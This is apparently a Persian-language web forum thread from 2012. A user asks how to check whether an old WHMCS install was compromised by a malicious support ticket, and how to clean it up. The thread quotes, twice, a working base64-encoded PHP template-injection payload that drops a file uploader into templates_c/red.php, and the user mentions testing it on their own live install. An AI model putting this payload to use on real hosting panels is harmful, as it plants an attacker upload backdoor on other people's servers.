-
March 31st, 2012, 22:37
#1
هک شدن
سلام دوستان ه هکر به کاهدون زده من قبلا یه hmcs داشتم همینطوری الکی بود رو یه هاست الکی همینطوری اتفاقی رفتم تو مدیریتش الان دیدم یه تیکت اومده
کد:
{php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw=='));{/php}
با این موضوع میخوام بدونم الان چطوری بفهمم کدوم فایلها آلوده شده ؟
و چطوری بر طرف کنم ؟
چون میخوام خودم رو hmcs اصلی خودم این کدرو تیکت کنم ببینم قبول میکنه یا نه چون رو این اصلیه همه تنظیمات امنیتی رو انجام دادم
-
-
March 31st, 2012 22:37
# ADS
-
March 31st, 2012, 23:37
#2
پاسخ : هک شدن
-
تعداد تشکر ها از php.source به دلیل پست مفید
-
March 31st, 2012, 23:49
#3
پاسخ : هک شدن
نوشته اصلی توسط
php.source
templates_c/red.php
ممنون که جواب دادین لطف کردین
فقط یه سوال این مسیر همیشه ثابت یا نه
اگه نه لطف میکنید بفرمایید از کجا باید متوجه شد که مسیر چیه ؟
تو این فایل دنبال چی باید بگردم ؟
خیلی لطف کردید تشکر
---------- Post added at 10:49 PM ---------- Previous post was at 10:44 PM ----------
template_c/red.php
همچین فایلی وجود نداره
تو این فولدر همه فایلها اسمشون مثل اینه
%%C3^C3F^C3FFE86C%%configuredomains.tpl.php
-
-
March 31st, 2012, 23:51
#4
پاسخ : هک شدن
مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید
کد:
JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==
که base 64 هست دی کد کنی
-
-
April 1st, 2012, 00:05
#5
پاسخ : هک شدن
نوشته اصلی توسط
php.source
مسیر بسته به نوع سلیقه بچه هکر تغییر میکنه
باید
کد:
JGNvZGUgPSBiYXNlNjRfZGVjb2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJqMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltMTFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVndiRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZMmh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDBpWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsUFNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFhCc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzTkNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2IyRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5ZG1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJKMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZajVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzYjJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUgwTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzX2MvcmVkLnBocCIsInciKTsNCmZ3cml0ZSgkZm8sJGNvZGUpOw==
که base 64 هست دی کد کنی
میشه از سایتهایی که کد و دی کد میکنن استفاده کرد یا فرق داره ؟
---------- Post added at 11:05 PM ---------- Previous post was at 11:01 PM ----------
Free online base64 encoder and decoder based on php script
این سایت دکود کرد متوجه شدم
فقط مشکل بعدی اینه که من این red.php رو داخل این فولدر پیدا نکردم
-
-
April 1st, 2012, 00:06
#6
پاسخ : هک شدن
از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش
-
تعداد تشکر ها از php.source به دلیل پست مفید
-
April 1st, 2012, 00:09
#7
پاسخ : هک شدن
نوشته اصلی توسط
php.source
از هر نرم افزاری کهع میخوا استفاده کنی کن
base64 هستش
خوب حالا چطور باید اینو از روی هاستم پاک کنم ؟
من اون فایلرو پیدا نمیکنم یکم راهنمایی میکنید ممنون
-
-
April 1st, 2012, 00:26
#8
پاسخ : هک شدن
هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php
-
-
April 1st, 2012, 00:34
#9
پاسخ : هک شدن
نوشته اصلی توسط
php.source
هک نشدی دیگه
تمام فایل های داخل این پوشه رو پاک کن بجز index.php
متوجه شدم یعنی اگر هک میشدم این فایل باید ایجاد میشد
مشکل پیش نمیاد ؟
اینا برای چین اصلا ؟
-
-
April 1st, 2012, 01:04
#10
پاسخ : هک شدن
عرض کردم که این یه hmcs الکی بود دوران توفولیت نصب کرده بودم
الان گذری رفتم تو مدیریتش جالب اینه که اصلا این سایت فعال نبود در واقع اصلا هیچی نبود
تازه اون فایل هم که ایجاد نشده پس یعنی هک نشدم
من میخوام این کدرو تو hmcs اصلی خودم تستش کنم ببینم با اینکه همه چیو رعایت کردم سند میشه یا نه
اما اول باید بهمم اگر کار کرد چیکار کنم که سایتم پاکو منزه بشه
و بعد برم دنبال راه جلوگیریش
-
پاسخ با نقل قول
